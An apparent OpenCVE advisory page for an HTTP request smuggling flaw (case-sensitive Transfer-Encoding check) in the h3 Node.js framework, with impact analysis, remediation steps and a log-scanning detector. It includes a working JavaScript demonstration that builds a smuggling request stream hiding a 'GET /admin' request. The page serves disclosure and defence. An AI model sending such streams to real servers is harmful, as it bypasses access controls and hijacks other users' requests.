Description
H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5.
Published: 2026-01-15
Score: 8.9 High
EPSS: < 1% Very Low
KEV: No
Impact: HTTP Request Smuggling via case-sensitive Transfer-Encoding header handling
Action: Apply Latest Patch
AI Analysis

Impact

The vulnerability arises because the framework's body parsing logic (readRawBody) only treats a request body as chunked when the Transfer-Encoding value is exactly "chunked", whereas RFC 9112 makes header field names and transfer-coding names case-insensitive, so "Chunked" or "CHUNKED" is an equally valid chunked encoding. Placed behind a front-end (reverse proxy, load balancer, CDN) that applies the case-insensitive rule, h3 and the front-end can disagree about where one request ends and the next begins, a TE.TE desync: the front-end sees a single chunked request, while h3 does not apply chunked decoding, so bytes the front-end treated as body can be parsed by h3 as the start of a second, smuggled request that never passed the front-end's checks. This is CWE-444 (inconsistent interpretation of HTTP requests); the advisory text calls it critical, although the assigned CVSS 3.1 score is 8.9 (High).
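To make the desync concrete, here is an added example (not code from h3 or OpenCVE): a toy HTTP/1.1 request framer run twice over the same byte stream, once with a strict pre-1.15.5-style Transfer-Encoding check and once with the RFC 9112 case-insensitive rule. The function names and the sample stream are constructed for this example and are not h3 APIs.

```javascript
// Added example, not code from h3 or OpenCVE: a toy HTTP/1.1 request framer
// run twice over the same byte stream, once with a strict (pre-1.15.5 style)
// Transfer-Encoding check and once with the RFC 9112 case-insensitive rule,
// to show the TE.TE desync the advisory describes. Function names and the
// sample stream are constructed for this example; they are not h3 APIs.

// Vulnerable check as the advisory describes it: exact match on "chunked".
function isChunkedStrict(teValue) {
  return teValue === "chunked";
}

// RFC 9112 section 7: transfer-coding names are case-insensitive. The field
// is a comma-separated list and chunked must be the final coding; a value
// whose final coding is not chunked should be rejected with 400, which this
// toy framer does not model.
function isChunkedRfc(teValue) {
  const codings = teValue.split(",").map((c) => c.trim().toLowerCase());
  return codings[codings.length - 1] === "chunked";
}

// Parse one request head starting at offset. Header names are lowercased and
// values trimmed. Returns null if the blank line ending the head is missing.
function parseHead(buf, offset) {
  const end = buf.indexOf("\r\n\r\n", offset);
  if (end === -1) return null;
  const lines = buf.slice(offset, end).split("\r\n");
  const headers = {};
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(":");
    headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { requestLine: lines[0], headers, bodyStart: end + 4 };
}

// Skip a chunked body (hex chunk-size lines, no chunk extensions or
// trailers). Returns the offset just past the final CRLF.
function skipChunked(buf, offset) {
  for (;;) {
    const lineEnd = buf.indexOf("\r\n", offset);
    const size = parseInt(buf.slice(offset, lineEnd), 16);
    offset = lineEnd + 2;
    if (size === 0) return offset + 2; // empty trailer section, then CRLF
    offset += size + 2; // chunk data plus its CRLF
  }
}

// Split a raw stream into request lines. isChunked decides whether the
// Transfer-Encoding value means a chunked body; otherwise Content-Length
// (0 when absent) is used. That disagreement is what the attack relies on.
function frameRequests(buf, isChunked) {
  const requestLines = [];
  let offset = 0;
  while (offset < buf.length) {
    const head = parseHead(buf, offset);
    if (head === null) break;
    const te = head.headers["transfer-encoding"];
    if (te !== undefined && isChunked(te)) {
      offset = skipChunked(buf, head.bodyStart);
    } else {
      offset = head.bodyStart + parseInt(head.headers["content-length"] || "0", 10);
    }
    requestLines.push(head.requestLine);
  }
  return requestLines;
}

// Constructed attack stream (TE.CL layout): Content-Length: 4 covers only the
// chunk-size line "39\r\n"; the chunk data is a complete second request whose
// own Content-Length: 7 swallows the trailing "\r\n0\r\n\r\n", so the strict
// back-end's view of the stream ends cleanly.
const SMUGGLED = "GET /admin HTTP/1.1\r\nHost: example\r\nContent-Length: 7\r\n\r\n";
const ATTACK_STREAM =
  "POST / HTTP/1.1\r\nHost: example\r\nContent-Length: 4\r\nTransfer-Encoding: Chunked\r\n\r\n" +
  SMUGGLED.length.toString(16) + "\r\n" + SMUGGLED + "\r\n0\r\n\r\n";

// Same request with canonical lowercase "chunked": both checks agree.
const BENIGN_STREAM = ATTACK_STREAM.replace("Transfer-Encoding: Chunked", "Transfer-Encoding: chunked");

// A front-end applying the RFC rule sees one request; a strict back-end sees
// the smuggled GET /admin as a second request the front-end never inspected.
function desync(stream) {
  return {
    frontEnd: frameRequests(stream, isChunkedRfc),
    strictBackEnd: frameRequests(stream, isChunkedStrict),
  };
}

console.log(desync(ATTACK_STREAM));
console.log(desync(BENIGN_STREAM));
```

Run with node: for ATTACK_STREAM the front-end view is one request and the strict view is two, with "GET /admin HTTP/1.1" as the second; for BENIGN_STREAM both views are one request, which is why the bug only matters when the Transfer-Encoding value is not spelled exactly "chunked".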

Affected Systems

The affected product is the h3 framework from h3js, intended for Node.js environments. All releases earlier than version 1.15.5 are impacted; the issue was rectified in that release.

Risk and Exploitability

The CVSS 3.1 score of 8.9 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L) rates the issue High: reachable over the network with no privileges or user interaction, but with high attack complexity, because a smuggled request can only affect other users when a front-end (reverse proxy, load balancer, CDN) multiplexes client connections onto a shared connection to h3 and itself applies the case-insensitive Transfer-Encoding rule while forwarding the mixed-case value unchanged. The EPSS score is below 1% and the CVE is not in the CISA Known Exploited Vulnerabilities catalog, so known exploitation is not indicated at the time of writing, although the SSVC assessment records the technical impact as total. An attacker needs only the ability to send crafted HTTP/1.1 requests to the front-end. A successful desync lets the smuggled request bypass front-end access controls, prefix another client's next request on the shared connection with attacker-chosen bytes (session hijacking, response queue poisoning), or break framing on that connection (denial of service).

Generated by OpenCVE AI on April 15, 2026 at 15:51 UTC.

Remediation

Vendor fix: h3 1.15.5 (the advisory states the issue is fixed in that release). No separate workaround is published.

OpenCVE Recommended Actions

  • Upgrade the h3 dependency to version 1.15.5 or later, which compares the Transfer-Encoding value case-insensitively; check transitive copies as well (for example with npm ls h3), since other packages may pin an older h3.
  • If upgrading is not immediately possible, patch the readRawBody check in the vendored copy to match "chunked" regardless of case, and in parallel configure the front-end (reverse proxy, load balancer, CDN) to reject or normalize ambiguous framing: requests carrying both Content-Length and Transfer-Encoding, or a Transfer-Encoding value other than exactly "chunked".
  • After applying the change, run request-smuggling test cases (a mixed-case Transfer-Encoding with a conflicting Content-Length, sent through the front-end) and monitor front-end logs for anomalous Transfer-Encoding headers to confirm that h3 and the front-end now frame requests identically.
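As an added example of the log monitoring step (not OpenCVE or h3 code), the scanner below flags the Transfer-Encoding patterns that indicate TE.TE probing. It assumes the front-end writes one JSON object per request with a lowercase "headers" map whose values are arrays, so repeated headers are preserved; that log format, its field names, and the sample lines are constructed here.

```javascript
// Added example, not OpenCVE or h3 code: scan front-end access logs for
// anomalous Transfer-Encoding headers. Assumed (constructed) log format: one
// JSON object per request, "headers" is a lowercase-name map whose values are
// arrays so that repeated headers are kept. The sample lines are constructed.

const SAMPLE_LOG = [
  '{"ts":"2026-01-16T10:00:00Z","src":"203.0.113.10","method":"POST","path":"/api/upload","headers":{"transfer-encoding":["chunked"]}}',
  '{"ts":"2026-01-16T10:00:01Z","src":"203.0.113.10","method":"POST","path":"/api/upload","headers":{"transfer-encoding":["Chunked"],"content-length":["4"]}}',
  '{"ts":"2026-01-16T10:00:02Z","src":"203.0.113.10","method":"POST","path":"/api/upload","headers":{"transfer-encoding":["chunked","identity"]}}',
  '{"ts":"2026-01-16T10:00:03Z","src":"198.51.100.7","method":"GET","path":"/","headers":{"accept":["*/*"]}}',
  '{"ts":"2026-01-16T10:00:04Z","src":"203.0.113.10","method":"POST","path":"/api/upload","headers":{"transfer-encoding":["chunked "]}}',
];

// Detection rules. Real HTTP clients send exactly "chunked"; any other
// spelling (case, whitespace, extra codings) is a classic TE.TE probe, and a
// request carrying both Transfer-Encoding and Content-Length is the ambiguity
// that RFC 9112 section 6.3 says a server ought to treat as an error.
function analyzeHeaders(headers) {
  const findings = [];
  const te = headers["transfer-encoding"] || [];
  if (te.length === 0) return findings;
  if (te.length > 1) findings.push("repeated-transfer-encoding");
  for (const value of te) {
    if (value !== "chunked") findings.push("non-canonical-te:" + JSON.stringify(value));
  }
  if ((headers["content-length"] || []).length > 0) findings.push("te-with-content-length");
  return findings;
}

// Return one record per suspicious log line.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = JSON.parse(line);
    const findings = analyzeHeaders(entry.headers || {});
    if (findings.length > 0) hits.push({ ts: entry.ts, src: entry.src, path: entry.path, findings });
  }
  return hits;
}

// Aggregate by source address so repeated probing from one client stands out.
function countBySource(hits) {
  const counts = {};
  for (const hit of hits) counts[hit.src] = (counts[hit.src] || 0) + 1;
  return counts;
}

const suspicious = scanLog(SAMPLE_LOG);
console.log(suspicious);
console.log(countBySource(suspicious));
```

Over the sample log this reports three suspicious lines, all from 203.0.113.10: the mixed-case "Chunked" combined with a Content-Length, a repeated Transfer-Encoding header, and a value with trailing whitespace. Adapt the field names to your own proxy's log schema; the rules themselves do not depend on it.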

Generated by OpenCVE AI on April 15, 2026 at 15:51 UTC.

Advisories

Source: GitHub GHSA
ID: GHSA-mp2g-9vg9-f4cg
Title: h3 v1 has Request Smuggling (TE.TE) issue

History

Mon, 13 Apr 2026 17:15:00 +0000

Title: removed "Request Smuggling (TE.TE) in h3 v1"; added "h3 v1 has Request Smuggling (TE.TE) issue"
References: changed

Fri, 23 Jan 2026 19:00:00 +0000

First Time appeared: H3; H3 h3
CPEs: added cpe:2.3:a:h3:h3:*:*:*:*:*:node.js:*:*
Vendors & Products: added H3; H3 h3

Fri, 16 Jan 2026 14:15:00 +0000

First Time appeared: H3js; H3js h3
Vendors & Products: added H3js; H3js h3

Fri, 16 Jan 2026 12:15:00 +0000

References: changed
Metrics threat_severity: removed None; added Important

Thu, 15 Jan 2026 20:15:00 +0000

Metrics ssvc: added {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 15 Jan 2026 19:45:00 +0000

Description: added "H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5."
Title: added "Request Smuggling (TE.TE) in h3 v1"
Weaknesses: added CWE-444
References: changed
Metrics cvssV3_1: added {'score': 8.9, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L'}

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-13T16:48:19.873Z

Reserved: 2026-01-13T18:22:43.981Z

Link: CVE-2026-23527

Vulnrichment

Updated: 2026-01-15T19:59:59.151Z

NVD

Status : Modified

Published: 2026-01-15T20:16:05.620

Modified: 2026-04-13T17:16:27.900

Link: CVE-2026-23527

Redhat

Severity : Important

Public Date: 2026-01-15T19:24:20Z

Links: CVE-2026-23527 - Bugzilla

OpenCVE Enrichment

Updated: 2026-04-15T18:15:10Z

Weaknesses